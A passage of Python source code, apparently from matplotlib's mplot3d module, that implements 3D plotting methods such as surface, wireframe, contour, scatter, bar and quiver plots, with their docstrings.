zs = np.broadcast_to(zs, len(xs))
lines = super().plot(xs, ys, *args, **kwargs)
for line in lines:
art3d.line_2d_to_3d(line, zs=zs, zdir=zdir)
xs, ys, zs = art3d.juggle_axes(xs, ys, zs, zdir)
self.auto_scale_xyz(xs, ys, zs, had_data)
return lines
plot3D = plot
def plot_surface(self, X, Y, Z, *args, norm=None, vmin=None,
vmax=None, lightsource=None, **kwargs):
"""
Create a surface plot.
By default it will be colored in shades of a solid color, but it also
supports color mapping by supplying the *cmap* argument.
.. note::
The *rcount* and *ccount* kwargs, which both default to 50,
determine the maximum number of samples used in each direction. If
the input data is larger, it will be downsampled (by slicing) to
these numbers of points.
Parameters
----------
X, Y, Z : 2d arrays
Data values.
rcount, ccount : int
Maximum number of samples used in each direction. If the input
data is larger, it will be downsampled (by slicing) to these
numbers of points. Defaults to 50.
.. versionadded:: 2.0
rstride, cstride : int
Downsampling stride in each direction. These arguments are
mutually exclusive with *rcount* and *ccount*. If only one of
*rstride* or *cstride* is set, the other defaults to 10.
'classic' mode uses a default of ``rstride = cstride = 10`` instead
of the new default of ``rcount = ccount = 50``.
color : color-like
Color of the surface patches.
cmap : Colormap
Colormap of the surface patches.
facecolors : array-like of colors.
Colors of each individual patch.
norm : Normalize
Normalization for the colormap.
vmin, vmax : float
Bounds for the normalization.
shade : bool
Whether to shade the face colors.
**kwargs :
Other arguments are forwarded to `.Poly3DCollection`.
"""
had_data = self.has_data()
if Z.ndim != 2:
raise ValueError("Argument Z must be 2-dimensional.")
# TODO: Support masked arrays
X, Y, Z = np.broadcast_arrays(X, Y, Z)
rows, cols = Z.shape
has_stride = 'rstride' in kwargs or 'cstride' in kwargs
has_count = 'rcount' in kwargs or 'ccount' in kwargs
if has_stride and has_count:
raise ValueError("Cannot specify both stride and count arguments")
rstride = kwargs.pop('rstride', 10)
cstride = kwargs.pop('cstride', 10)
rcount = kwargs.pop('rcount', 50)
ccount = kwargs.pop('ccount', 50)
if rcParams['_internal.classic_mode']:
# Strides have priority over counts in classic mode.
# So, only compute strides from counts
# if counts were explicitly given
compute_strides = has_count
else:
# If the strides are provided then it has priority.
# Otherwise, compute the strides from the counts.
compute_strides = not has_stride
if compute_strides:
rstride = int(max(np.ceil(rows / rcount), 1))
cstride = int(max(np.ceil(cols / ccount), 1))
if 'facecolors' in kwargs:
fcolors = kwargs.pop('facecolors')
else:
color = kwargs.pop('color', None)
if color is None:
color = self._get_lines.get_next_color()
color = np.array(mcolors.to_rgba(color))
fcolors = None
cmap = kwargs.get('cmap', None)
shade = kwargs.pop('shade', cmap is None)
# Shade the data
if shade and cmap is not None and fcolors is not None:
fcolors = self._shade_colors_lightsource(Z, cmap, lightsource)
# evenly spaced, and including both endpoints
row_inds = list(range(0, rows-1, rstride)) + [rows-1]
col_inds = list(range(0, cols-1, cstride)) + [cols-1]
colset = [] # the sampled facecolor
polys = []
for rs, rs_next in zip(row_inds[:-1], row_inds[1:]):
for cs, cs_next in zip(col_inds[:-1], col_inds[1:]):
ps = [
# +1 ensures we share edges between polygons
cbook._array_perimeter(a[rs:rs_next+1, cs:cs_next+1])
for a in (X, Y, Z)
]
# ps = np.stack(ps, axis=-1)
ps = np.array(ps).T
polys.append(ps)
if fcolors is not None:
colset.append(fcolors[rs][cs])
def get_normals(polygons):
"""
Takes a list of polygons and return an array of their normals
"""
v1 = np.empty((len(polygons), 3))
v2 = np.empty((len(polygons), 3))
for poly_i, ps in enumerate(polygons):
# pick three points around the polygon at which to find the normal
# doesn't vectorize because polygons is jagged
i1, i2, i3 = 0, len(ps)//3, 2*len(ps)//3
v1[poly_i, :] = ps[i1, :] - ps[i2, :]
v2[poly_i, :] = ps[i2, :] - ps[i3, :]
return np.cross(v1, v2)
# note that the striding causes some polygons to have more coordinates
# than others
polyc = art3d.Poly3DCollection(polys, *args, **kwargs)
if fcolors is not None:
if shade:
colset = self._shade_colors(colset, get_normals(polys))
polyc.set_facecolors(colset)
polyc.set_edgecolors(colset)
elif cmap:
# doesn't vectorize because polys is jagged
avg_z = np.array([ps[:,2].mean() for ps in polys])
polyc.set_array(avg_z)
if vmin is not None or vmax is not None:
polyc.set_clim(vmin, vmax)
if norm is not None:
polyc.set_norm(norm)
else:
if shade:
colset = self._shade_colors(color, get_normals(polys))
else:
colset = color
polyc.set_facecolors(colset)
self.add_collection(polyc)
self.auto_scale_xyz(X, Y, Z, had_data)
return polyc
def _generate_normals(self, polygons):
'''
Generate normals for polygons by using the first three points.
This normal of course might not make sense for polygons with
more than three points not lying in a plane.
'''
normals = []
for verts in polygons:
v1 = np.array(verts[0]) - np.array(verts[1])
v2 = np.array(verts[2]) - np.array(verts[0])
normals.append(np.cross(v1, v2))
return normals
def _shade_colors(self, color, normals):
'''
Shade *color* using normal vectors given by *normals*.
*color* can also be an array of the same length as *normals*.
'''
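        # Lambert-style shading: project each unit normal onto a fixed light
        # direction (-1, -1, 0.5), normalise the result to [0, 1], and scale the
        # RGB channels by 0.5 + 0.5*shade while keeping the original alpha.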
shade = np.array([np.dot(n / proj3d.mod(n), [-1, -1, 0.5])
if proj3d.mod(n) else np.nan
for n in normals])
mask = ~np.isnan(shade)
if len(shade[mask]) > 0:
norm = Normalize(min(shade[mask]), max(shade[mask]))
shade[~mask] = min(shade[mask])
color = mcolors.to_rgba_array(color)
# shape of color should be (M, 4) (where M is number of faces)
# shape of shade should be (M,)
# colors should have final shape of (M, 4)
alpha = color[:, 3]
colors = (0.5 + norm(shade)[:, np.newaxis] * 0.5) * color
colors[:, 3] = alpha
else:
colors = np.asanyarray(color).copy()
return colors
def _shade_colors_lightsource(self, data, cmap, lightsource):
if lightsource is None:
lightsource = LightSource(azdeg=135, altdeg=55)
return lightsource.shade(data, cmap)
def plot_wireframe(self, X, Y, Z, *args, **kwargs):
"""
Plot a 3D wireframe.
.. note::
The *rcount* and *ccount* kwargs, which both default to 50,
determine the maximum number of samples used in each direction. If
the input data is larger, it will be downsampled (by slicing) to
these numbers of points.
Parameters
----------
X, Y, Z : 2d arrays
Data values.
rcount, ccount : int
Maximum number of samples used in each direction. If the input
data is larger, it will be downsampled (by slicing) to these
numbers of points. Setting a count to zero causes the data to be
not sampled in the corresponding direction, producing a 3D line
plot rather than a wireframe plot. Defaults to 50.
.. versionadded:: 2.0
rstride, cstride : int
Downsampling stride in each direction. These arguments are
mutually exclusive with *rcount* and *ccount*. If only one of
*rstride* or *cstride* is set, the other defaults to 1. Setting a
stride to zero causes the data to be not sampled in the
corresponding direction, producing a 3D line plot rather than a
wireframe plot.
'classic' mode uses a default of ``rstride = cstride = 1`` instead
of the new default of ``rcount = ccount = 50``.
**kwargs :
Other arguments are forwarded to `.Line3DCollection`.
"""
had_data = self.has_data()
if Z.ndim != 2:
raise ValueError("Argument Z must be 2-dimensional.")
# FIXME: Support masked arrays
X, Y, Z = np.broadcast_arrays(X, Y, Z)
rows, cols = Z.shape
has_stride = 'rstride' in kwargs or 'cstride' in kwargs
has_count = 'rcount' in kwargs or 'ccount' in kwargs
if has_stride and has_count:
raise ValueError("Cannot specify both stride and count arguments")
rstride = kwargs.pop('rstride', 1)
cstride = kwargs.pop('cstride', 1)
rcount = kwargs.pop('rcount', 50)
ccount = kwargs.pop('ccount', 50)
if rcParams['_internal.classic_mode']:
# Strides have priority over counts in classic mode.
# So, only compute strides from counts
# if counts were explicitly given
if has_count:
rstride = int(max(np.ceil(rows / rcount), 1)) if rcount else 0
cstride = int(max(np.ceil(cols / ccount), 1)) if ccount else 0
else:
# If the strides are provided then it has priority.
# Otherwise, compute the strides from the counts.
if not has_stride:
rstride = int(max(np.ceil(rows / rcount), 1)) if rcount else 0
cstride = int(max(np.ceil(cols / ccount), 1)) if ccount else 0
# We want two sets of lines, one running along the "rows" of
# Z and another set of lines running along the "columns" of Z.
# This transpose will make it easy to obtain the columns.
tX, tY, tZ = np.transpose(X), np.transpose(Y), np.transpose(Z)
if rstride:
rii = list(range(0, rows, rstride))
# Add the last index only if needed
if rows > 0 and rii[-1] != (rows - 1):
rii += [rows-1]
else:
rii = []
if cstride:
cii = list(range(0, cols, cstride))
# Add the last index only if needed
if cols > 0 and cii[-1] != (cols - 1):
cii += [cols-1]
else:
cii = []
if rstride == 0 and cstride == 0:
raise ValueError("Either rstride or cstride must be non zero")
# If the inputs were empty, then just
# reset everything.
if Z.size == 0:
rii = []
cii = []
xlines = [X[i] for i in rii]
ylines = [Y[i] for i in rii]
zlines = [Z[i] for i in rii]
txlines = [tX[i] for i in cii]
tylines = [tY[i] for i in cii]
tzlines = [tZ[i] for i in cii]
lines = ([list(zip(xl, yl, zl))
for xl, yl, zl in zip(xlines, ylines, zlines)]
+ [list(zip(xl, yl, zl))
for xl, yl, zl in zip(txlines, tylines, tzlines)])
linec = art3d.Line3DCollection(lines, *args, **kwargs)
self.add_collection(linec)
self.auto_scale_xyz(X, Y, Z, had_data)
return linec
def plot_trisurf(self, *args, color=None, norm=None, vmin=None, vmax=None,
lightsource=None, **kwargs):
"""
============= ================================================
Argument Description
============= ================================================
*X*, *Y*, *Z* Data values as 1D arrays
*color* Color of the surface patches
*cmap* A colormap for the surface patches.
*norm* An instance of Normalize to map values to colors
*vmin* Minimum value to map
*vmax* Maximum value to map
*shade* Whether to shade the facecolors
============= ================================================
The (optional) triangulation can be specified in one of two ways;
either::
plot_trisurf(triangulation, ...)
where triangulation is a :class:`~matplotlib.tri.Triangulation`
object, or::
plot_trisurf(X, Y, ...)
plot_trisurf(X, Y, triangles, ...)
plot_trisurf(X, Y, triangles=triangles, ...)
in which case a Triangulation object will be created. See
        :class:`~matplotlib.tri.Triangulation` for an explanation of
these possibilities.
The remaining arguments are::
plot_trisurf(..., Z)
where *Z* is the array of values to contour, one per point
in the triangulation.
Other arguments are passed on to
:class:`~mpl_toolkits.mplot3d.art3d.Poly3DCollection`
**Examples:**
.. plot:: gallery/mplot3d/trisurf3d.py
.. plot:: gallery/mplot3d/trisurf3d_2.py
.. versionadded:: 1.2.0
This plotting function was added for the v1.2.0 release.
"""
had_data = self.has_data()
# TODO: Support custom face colours
if color is None:
color = self._get_lines.get_next_color()
color = np.array(mcolors.to_rgba(color))
cmap = kwargs.get('cmap', None)
shade = kwargs.pop('shade', cmap is None)
tri, args, kwargs = Triangulation.get_from_args_and_kwargs(*args, **kwargs)
if 'Z' in kwargs:
z = np.asarray(kwargs.pop('Z'))
else:
z = np.asarray(args[0])
# We do this so Z doesn't get passed as an arg to PolyCollection
args = args[1:]
triangles = tri.get_masked_triangles()
xt = tri.x[triangles]
yt = tri.y[triangles]
zt = z[triangles]
verts = np.stack((xt, yt, zt), axis=-1)
polyc = art3d.Poly3DCollection(verts, *args, **kwargs)
if cmap:
# average over the three points of each triangle
avg_z = verts[:, :, 2].mean(axis=1)
polyc.set_array(avg_z)
if vmin is not None or vmax is not None:
polyc.set_clim(vmin, vmax)
if norm is not None:
polyc.set_norm(norm)
else:
if shade:
v1 = verts[:, 0, :] - verts[:, 1, :]
v2 = verts[:, 1, :] - verts[:, 2, :]
normals = np.cross(v1, v2)
colset = self._shade_colors(color, normals)
else:
colset = color
polyc.set_facecolors(colset)
self.add_collection(polyc)
self.auto_scale_xyz(tri.x, tri.y, z, had_data)
return polyc
def _3d_extend_contour(self, cset, stride=5):
'''
        Extend a contour in 3D by creating a band of filled polygons around
        each contour line, spanning half a level step above and below it,
        and removing the original flat line collections.
'''
levels = cset.levels
colls = cset.collections
dz = (levels[1] - levels[0]) / 2
for z, linec in zip(levels, colls):
paths = linec.get_paths()
if not paths:
continue
topverts = art3d.paths_to_3d_segments(paths, z - dz)
botverts = art3d.paths_to_3d_segments(paths, z + dz)
color = linec.get_color()[0]
polyverts = []
normals = []
nsteps = np.round(len(topverts[0]) / stride)
if nsteps <= 1:
if len(topverts[0]) > 1:
nsteps = 2
else:
continue
stepsize = (len(topverts[0]) - 1) / (nsteps - 1)
for i in range(int(np.round(nsteps)) - 1):
i1 = int(np.round(i * stepsize))
i2 = int(np.round((i + 1) * stepsize))
polyverts.append([topverts[0][i1],
topverts[0][i2],
botverts[0][i2],
botverts[0][i1]])
v1 = np.array(topverts[0][i1]) - np.array(topverts[0][i2])
v2 = np.array(topverts[0][i1]) - np.array(botverts[0][i1])
normals.append(np.cross(v1, v2))
colors = self._shade_colors(color, normals)
colors2 = self._shade_colors(color, normals)
polycol = art3d.Poly3DCollection(polyverts,
facecolors=colors,
edgecolors=colors2)
polycol.set_sort_zpos(z)
self.add_collection3d(polycol)
for col in colls:
self.collections.remove(col)
def add_contour_set(self, cset, extend3d=False, stride=5, zdir='z', offset=None):
zdir = '-' + zdir
if extend3d:
self._3d_extend_contour(cset, stride)
else:
for z, linec in zip(cset.levels, cset.collections):
if offset is not None:
z = offset
art3d.line_collection_2d_to_3d(linec, z, zdir=zdir)
def add_contourf_set(self, cset, zdir='z', offset=None):
zdir = '-' + zdir
for z, linec in zip(cset.levels, cset.collections):
if offset is not None :
z = offset
art3d.poly_collection_2d_to_3d(linec, z, zdir=zdir)
linec.set_sort_zpos(z)
def contour(self, X, Y, Z, *args,
extend3d=False, stride=5, zdir='z', offset=None, **kwargs):
'''
Create a 3D contour plot.
========== ================================================
Argument Description
========== ================================================
*X*, *Y*, Data values as numpy.arrays
*Z*
*extend3d* Whether to extend contour in 3D (default: False)
*stride* Stride (step size) for extending contour
*zdir* The direction to use: x, y or z (default)
*offset* If specified plot a projection of the contour
lines on this position in plane normal to zdir
========== ================================================
The positional and other keyword arguments are passed on to
:func:`~matplotlib.axes.Axes.contour`
Returns a :class:`~matplotlib.axes.Axes.contour`
'''
had_data = self.has_data()
jX, jY, jZ = art3d.rotate_axes(X, Y, Z, zdir)
cset = super().contour(jX, jY, jZ, *args, **kwargs)
self.add_contour_set(cset, extend3d, stride, zdir, offset)
self.auto_scale_xyz(X, Y, Z, had_data)
return cset
contour3D = contour
def tricontour(self, *args,
extend3d=False, stride=5, zdir='z', offset=None, **kwargs):
"""
Create a 3D contour plot.
========== ================================================
Argument Description
========== ================================================
*X*, *Y*, Data values as numpy.arrays
*Z*
*extend3d* Whether to extend contour in 3D (default: False)
*stride* Stride (step size) for extending contour
*zdir* The direction to use: x, y or z (default)
*offset* If specified plot a projection of the contour
lines on this position in plane normal to zdir
========== ================================================
Other keyword arguments are passed on to
:func:`~matplotlib.axes.Axes.tricontour`
Returns a :class:`~matplotlib.axes.Axes.contour`
.. versionchanged:: 1.3.0
Added support for custom triangulations
EXPERIMENTAL: This method currently produces incorrect output due to a
longstanding bug in 3D PolyCollection rendering.
"""
had_data = self.has_data()
tri, args, kwargs = Triangulation.get_from_args_and_kwargs(
*args, **kwargs)
X = tri.x
Y = tri.y
if 'Z' in kwargs:
Z = kwargs.pop('Z')
else:
Z = args[0]
# We do this so Z doesn't get passed as an arg to Axes.tricontour
args = args[1:]
jX, jY, jZ = art3d.rotate_axes(X, Y, Z, zdir)
tri = Triangulation(jX, jY, tri.triangles, tri.mask)
cset = super().tricontour(tri, jZ, *args, **kwargs)
self.add_contour_set(cset, extend3d, stride, zdir, offset)
self.auto_scale_xyz(X, Y, Z, had_data)
return cset
def contourf(self, X, Y, Z, *args, zdir='z', offset=None, **kwargs):
'''
Create a 3D contourf plot.
========== ================================================
Argument Description
========== ================================================
*X*, *Y*, Data values as numpy.arrays
*Z*
*zdir* The direction to use: x, y or z (default)
*offset* If specified plot a projection of the filled contour
on this position in plane normal to zdir
========== ================================================
The positional and keyword arguments are passed on to
:func:`~matplotlib.axes.Axes.contourf`
Returns a :class:`~matplotlib.axes.Axes.contourf`
.. versionchanged :: 1.1.0
The *zdir* and *offset* kwargs were added.
'''
had_data = self.has_data()
jX, jY, jZ = art3d.rotate_axes(X, Y, Z, zdir)
cset = super().contourf(jX, jY, jZ, *args, **kwargs)
self.add_contourf_set(cset, zdir, offset)
self.auto_scale_xyz(X, Y, Z, had_data)
return cset
contourf3D = contourf
def tricontourf(self, *args, zdir='z', offset=None, **kwargs):
"""
Create a 3D contourf plot.
========== ================================================
Argument Description
========== ================================================
*X*, *Y*, Data values as numpy.arrays
*Z*
*zdir* The direction to use: x, y or z (default)
*offset* If specified plot a projection of the contour
lines on this position in plane normal to zdir
========== ================================================
Other keyword arguments are passed on to
:func:`~matplotlib.axes.Axes.tricontour`
Returns a :class:`~matplotlib.axes.Axes.contour`
.. versionchanged :: 1.3.0
Added support for custom triangulations
EXPERIMENTAL: This method currently produces incorrect output due to a
longstanding bug in 3D PolyCollection rendering.
"""
had_data = self.has_data()
tri, args, kwargs = Triangulation.get_from_args_and_kwargs(
*args, **kwargs)
X = tri.x
Y = tri.y
if 'Z' in kwargs:
Z = kwargs.pop('Z')
else:
Z = args[0]
# We do this so Z doesn't get passed as an arg to Axes.tricontourf
args = args[1:]
jX, jY, jZ = art3d.rotate_axes(X, Y, Z, zdir)
tri = Triangulation(jX, jY, tri.triangles, tri.mask)
cset = super().tricontourf(tri, jZ, *args, **kwargs)
self.add_contourf_set(cset, zdir, offset)
self.auto_scale_xyz(X, Y, Z, had_data)
return cset
def add_collection3d(self, col, zs=0, zdir='z'):
'''
Add a 3D collection object to the plot.
2D collection types are converted to a 3D version by
modifying the object and adding z coordinate information.
Supported are:
- PolyCollection
- LineCollection
- PatchCollection
'''
zvals = np.atleast_1d(zs)
if len(zvals) > 0 :
zsortval = min(zvals)
else :
zsortval = 0 # FIXME: Fairly arbitrary. Is there a better value?
# FIXME: use issubclass() (although, then a 3D collection
# object would also pass.) Maybe have a collection3d
# abstract class to test for and exclude?
if type(col) is mcoll.PolyCollection:
art3d.poly_collection_2d_to_3d(col, zs=zs, zdir=zdir)
col.set_sort_zpos(zsortval)
elif type(col) is mcoll.LineCollection:
art3d.line_collection_2d_to_3d(col, zs=zs, zdir=zdir)
col.set_sort_zpos(zsortval)
elif type(col) is mcoll.PatchCollection:
art3d.patch_collection_2d_to_3d(col, zs=zs, zdir=zdir)
col.set_sort_zpos(zsortval)
super().add_collection(col)
def scatter(self, xs, ys, zs=0, zdir='z', s=20, c=None, depthshade=True,
*args, **kwargs):
"""
Create a scatter plot.
Parameters
----------
xs, ys : array-like
The data positions.
zs : float or array-like, optional, default: 0
The z-positions. Either an array of the same length as *xs* and
*ys* or a single value to place all points in the same plane.
zdir : {'x', 'y', 'z', '-x', '-y', '-z'}, optional, default: 'z'
The axis direction for the *zs*. This is useful when plotting 2D
data on a 3D Axes. The data must be passed as *xs*, *ys*. Setting
*zdir* to 'y' then plots the data to the x-z-plane.
See also :doc:`/gallery/mplot3d/2dcollections3d`.
s : scalar or array-like, optional, default: 20
The marker size in points**2. Either an array of the same length
as *xs* and *ys* or a single value to make all markers the same
size.
c : color, sequence, or sequence of color, optional
The marker color. Possible values:
- A single color format string.
- A sequence of color specifications of length n.
- A sequence of n numbers to be mapped to colors using *cmap* and
*norm*.
- A 2-D array in which the rows are RGB or RGBA.
For more details see the *c* argument of `~.axes.Axes.scatter`.
depthshade : bool, optional, default: True
Whether to shade the scatter markers to give the appearance of
depth.
**kwargs
All other arguments are passed on to `~.axes.Axes.scatter`.
Returns
-------
paths : `~matplotlib.collections.PathCollection`
"""
had_data = self.has_data()
xs, ys, zs = np.broadcast_arrays(
*[np.ravel(np.ma.filled(t, np.nan)) for t in [xs, ys, zs]])
s = np.ma.ravel(s) # This doesn't have to match x, y in size.
xs, ys, zs, s, c = cbook.delete_masked_points(xs, ys, zs, s, c)
patches = super().scatter(xs, ys, s=s, c=c, *args, **kwargs)
is_2d = not cbook.iterable(zs)
zs = np.broadcast_to(zs, len(xs))
art3d.patch_collection_2d_to_3d(patches, zs=zs, zdir=zdir,
depthshade=depthshade)
if self._zmargin < 0.05 and xs.size > 0:
self.set_zmargin(0.05)
#FIXME: why is this necessary?
if not is_2d:
self.auto_scale_xyz(xs, ys, zs, had_data)
return patches
scatter3D = scatter
def bar(self, left, height, zs=0, zdir='z', *args, **kwargs):
'''
Add 2D bar(s).
========== ================================================
Argument Description
========== ================================================
*left* The x coordinates of the left sides of the bars.
*height* The height of the bars.
*zs* Z coordinate of bars, if one value is specified
they will all be placed at the same z.
*zdir* Which direction to use as z ('x', 'y' or 'z')
when plotting a 2D set.
========== ================================================
Keyword arguments are passed onto :func:`~matplotlib.axes.Axes.bar`.
Returns a :class:`~mpl_toolkits.mplot3d.art3d.Patch3DCollection`
'''
had_data = self.has_data()
patches = super().bar(left, height, *args, **kwargs)
zs = np.broadcast_to(zs, len(left))
verts = []
verts_zs = []
for p, z in zip(patches, zs):
vs = art3d.get_patch_verts(p)
verts += vs.tolist()
verts_zs += [z] * len(vs)
art3d.patch_2d_to_3d(p, z, zdir)
if 'alpha' in kwargs:
p.set_alpha(kwargs['alpha'])
if len(verts) > 0 :
# the following has to be skipped if verts is empty
# NOTE: Bugs could still occur if len(verts) > 0,
# but the "2nd dimension" is empty.
xs, ys = list(zip(*verts))
else :
xs, ys = [], []
xs, ys, verts_zs = art3d.juggle_axes(xs, ys, verts_zs, zdir)
self.auto_scale_xyz(xs, ys, verts_zs, had_data)
return patches
def bar3d(self, x, y, z, dx, dy, dz, color=None,
zsort='average', shade=True, *args, **kwargs):
"""Generate a 3D barplot.
        This method creates a three-dimensional bar plot where the width,
        depth, height, and color of the bars can all be set individually.
Parameters
----------
x, y, z : array-like
The coordinates of the anchor point of the bars.
dx, dy, dz : scalar or array-like
The width, depth, and height of the bars, respectively.
color : sequence of valid color specifications, optional
The color of the bars can be specified globally or
individually. This parameter can be:
- A single color value, to color all bars the same color.
- An array of colors of length N bars, to color each bar
independently.
- An array of colors of length 6, to color the faces of the
bars similarly.
- An array of colors of length 6 * N bars, to color each face
independently.
When coloring the faces of the boxes specifically, this is
the order of the coloring:
1. -Z (bottom of box)
2. +Z (top of box)
3. -Y
4. +Y
5. -X
6. +X
zsort : str, optional
The z-axis sorting scheme passed onto
:func:`~mpl_toolkits.mplot3d.art3d.Poly3DCollection`
shade : bool, optional (default = True)
When true, this shades the dark sides of the bars (relative
to the plot's source of light).
Any additional keyword arguments are passed onto
:func:`~mpl_toolkits.mplot3d.art3d.Poly3DCollection`
Returns
-------
collection : Poly3DCollection
A collection of three dimensional polygons representing
the bars.
"""
had_data = self.has_data()
x, y, z, dx, dy, dz = np.broadcast_arrays(
np.atleast_1d(x), y, z, dx, dy, dz)
minx = np.min(x)
maxx = np.max(x + dx)
miny = np.min(y)
maxy = np.max(y + dy)
minz = np.min(z)
maxz = np.max(z + dz)
polys = []
for xi, yi, zi, dxi, dyi, dzi in zip(x, y, z, dx, dy, dz):
polys.extend([
((xi, yi, zi), (xi + dxi, yi, zi),
(xi + dxi, yi + dyi, zi), (xi, yi + dyi, zi)),
((xi, yi, zi + dzi), (xi + dxi, yi, zi + dzi),
(xi + dxi, yi + dyi, zi + dzi), (xi, yi + dyi, zi + dzi)),
((xi, yi, zi), (xi + dxi, yi, zi),
(xi + dxi, yi, zi + dzi), (xi, yi, zi + dzi)),
((xi, yi + dyi, zi), (xi + dxi, yi + dyi, zi),
(xi + dxi, yi + dyi, zi + dzi), (xi, yi + dyi, zi + dzi)),
((xi, yi, zi), (xi, yi + dyi, zi),
(xi, yi + dyi, zi + dzi), (xi, yi, zi + dzi)),
((xi + dxi, yi, zi), (xi + dxi, yi + dyi, zi),
(xi + dxi, yi + dyi, zi + dzi), (xi + dxi, yi, zi + dzi)),
])
facecolors = []
if color is None:
color = [self._get_patches_for_fill.get_next_color()]
if len(color) == len(x):
# bar colors specified, need to expand to number of faces
for c in color:
facecolors.extend([c] * 6)
else:
# a single color specified, or face colors specified explicitly
facecolors = list(mcolors.to_rgba_array(color))
if len(facecolors) < len(x):
facecolors *= (6 * len(x))
if shade:
normals = self._generate_normals(polys)
sfacecolors = self._shade_colors(facecolors, normals)
else:
sfacecolors = facecolors
col = art3d.Poly3DCollection(polys,
zsort=zsort,
facecolor=sfacecolors,
*args, **kwargs)
self.add_collection(col)
self.auto_scale_xyz((minx, maxx), (miny, maxy), (minz, maxz), had_data)
return col
def set_title(self, label, fontdict=None, loc='center', **kwargs):
ret = super().set_title(label, fontdict=fontdict, loc=loc, **kwargs)
(x, y) = self.title.get_position()
self.title.set_y(0.92 * y)
return ret
set_title.__doc__ = maxes.Axes.set_title.__doc__
def quiver(self, *args,
length=1, arrow_length_ratio=.3, pivot='tail', normalize=False,
**kwargs):
"""
Plot a 3D field of arrows.
call signatures::
quiver(X, Y, Z, U, V, W, **kwargs)
Arguments:
*X*, *Y*, *Z*:
The x, y and z coordinates of the arrow locations (default is
tail of arrow; see *pivot* kwarg)
*U*, *V*, *W*:
The x, y and z components of the arrow vectors
        The arguments may be array-like or scalars, so long as they
        can be broadcast together. The arguments can also be
        masked arrays. If an element in any of the arguments is masked,
        then the corresponding quiver element will not be plotted.
Keyword arguments:
        *length*: [1.0 | float]
            The length of each quiver; defaults to 1.0. The unit is
            the same as that of the axes.
        *arrow_length_ratio*: [0.3 | float]
            The ratio of the arrow head length to the quiver length;
            defaults to 0.3.
*pivot*: [ 'tail' | 'middle' | 'tip' ]
The part of the arrow that is at the grid point; the arrow
rotates about this point, hence the name *pivot*.
Default is 'tail'
*normalize*: bool
When True, all of the arrows will be the same length. This
defaults to False, where the arrows will be different lengths
depending on the values of u,v,w.
Any additional keyword arguments are delegated to
:class:`~matplotlib.collections.LineCollection`
"""
def calc_arrow(uvw, angle=15):
"""
            Calculate the two arrowhead direction vectors by rotating the
            shaft direction *uvw* by +/- *angle* degrees about an axis
            perpendicular to it.
"""
# get unit direction vector perpendicular to (u,v,w)
norm = np.linalg.norm(uvw[:2])
if norm > 0:
x = uvw[1] / norm
y = -uvw[0] / norm
else:
x, y = 0, 1
# compute the two arrowhead direction unit vectors
ra = math.radians(angle)
c = math.cos(ra)
s = math.sin(ra)
# construct the rotation matrices
Rpos = np.array([[c+(x**2)*(1-c), x*y*(1-c), y*s],
[y*x*(1-c), c+(y**2)*(1-c), -x*s],
[-y*s, x*s, c]])
# opposite rotation negates all the sin terms
Rneg = Rpos.copy()
Rneg[[0,1,2,2],[2,2,0,1]] = -Rneg[[0,1,2,2],[2,2,0,1]]
# multiply them to get the rotated vector
return Rpos.dot(uvw), Rneg.dot(uvw)
had_data = self.has_data()
# handle args
argi = 6
if len(args) < argi:
raise ValueError('Wrong number of arguments. Expected %d got %d' %
(argi, len(args)))
# first 6 arguments are X, Y, Z, U, V, W
input_args = args[:argi]
# if any of the args are scalar, convert into list
input_args = [[k] if isinstance(k, (int, float)) else k
for k in input_args]
# extract the masks, if any
masks = [k.mask for k in input_args if isinstance(k, np.ma.MaskedArray)]
# broadcast to match the shape
bcast = np.broadcast_arrays(*(input_args + masks))
input_args = bcast[:argi]
masks = bcast[argi:]
if masks:
# combine the masks into one
mask = reduce(np.logical_or, masks)
# put mask on and compress
input_args = [np.ma.array(k, mask=mask).compressed()
for k in input_args]
else:
input_args = [k.flatten() for k in input_args]
if any(len(v) == 0 for v in input_args):
# No quivers, so just make an empty collection and return early
linec = art3d.Line3DCollection([], *args[argi:], **kwargs)
self.add_collection(linec)
return linec
# Following assertions must be true before proceeding
# must all be ndarray
assert all(isinstance(k, np.ndarray) for k in input_args)
# must all in same shape
assert len({k.shape for k in input_args}) == 1
shaft_dt = np.linspace(0, length, num=2)
arrow_dt = shaft_dt * arrow_length_ratio
if pivot == 'tail':
shaft_dt -= length
elif pivot == 'middle':
shaft_dt -= length/2.
elif pivot != 'tip':
raise ValueError('Invalid pivot argument: ' + str(pivot))
XYZ = np.column_stack(input_args[:3])
UVW = np.column_stack(input_args[3:argi]).astype(float)
# Normalize rows of UVW
norm = np.linalg.norm(UVW, axis=1)
# If any row of UVW is all zeros, don't make a quiver for it
mask = norm > 0
XYZ = XYZ[mask]
if normalize:
UVW = UVW[mask] / norm[mask].reshape((-1, 1))
else:
UVW = UVW[mask]
if len(XYZ) > 0:
# compute the shaft lines all at once with an outer product
shafts = (XYZ - np.multiply.outer(shaft_dt, UVW)).swapaxes(0, 1)
# compute head direction vectors, n heads by 2 sides by 3 dimensions
head_dirs = np.array([calc_arrow(d) for d in UVW])
# compute all head lines at once, starting from where the shaft ends
heads = shafts[:, :1] - np.multiply.outer(arrow_dt, head_dirs)
# stack left and right head lines together
heads.shape = (len(arrow_dt), -1, 3)
# transpose to get a list of lines
heads = heads.swapaxes(0, 1)
lines = [*shafts, *heads]
else:
lines = []
linec = art3d.Line3DCollection(lines, *args[argi:], **kwargs)
self.add_collection(linec)
self.auto_scale_xyz(XYZ[:, 0], XYZ[:, 1], XYZ[:, 2], had_data)
return linec
quiver3D = quiver
def voxels(self, *args, facecolors=None, edgecolors=None, **kwargs):
"""
ax.voxels([x, y, z,] /, filled, **kwargs)
Plot a set of filled voxels
All voxels are plotted as 1x1x1 cubes on the axis, with filled[0,0,0]
placed with its lower corner at the origin. Occluded faces are not
plotted.
Call signatures::
voxels(filled, facecolors=fc, edgecolors=ec, **kwargs)
voxels(x, y, z, filled, facecolors=fc, edgecolors=ec, **kwargs)
.. versionadded:: 2.1
Parameters
----------
filled : 3D np.array of bool
A 3d array of values, with truthy values indicating which voxels
to fill
x, y, z : 3D np.array, optional
The coordinates of the corners of the voxels. This should broadcast
to a shape one larger in every dimension than the shape of `filled`.
These can be used to plot non-cubic voxels.
If not specified, defaults to increasing integers along each axis,
like those returned by :func:`~numpy.indices`.
As indicated by the ``/`` in the function signature, these arguments
can only be passed positionally.
facecolors, edgecolors : array_like, optional
The color to draw the faces and edges of the voxels. Can only be
passed as keyword arguments.
This parameter can be:
- A single color value, to color all voxels the same color. This
can be either a string, or a 1D rgb/rgba array
- ``None``, the default, to use a single color for the faces, and
the style default for the edges.
- A 3D ndarray of color names, with each item the color for the
corresponding voxel. The size must match the voxels.
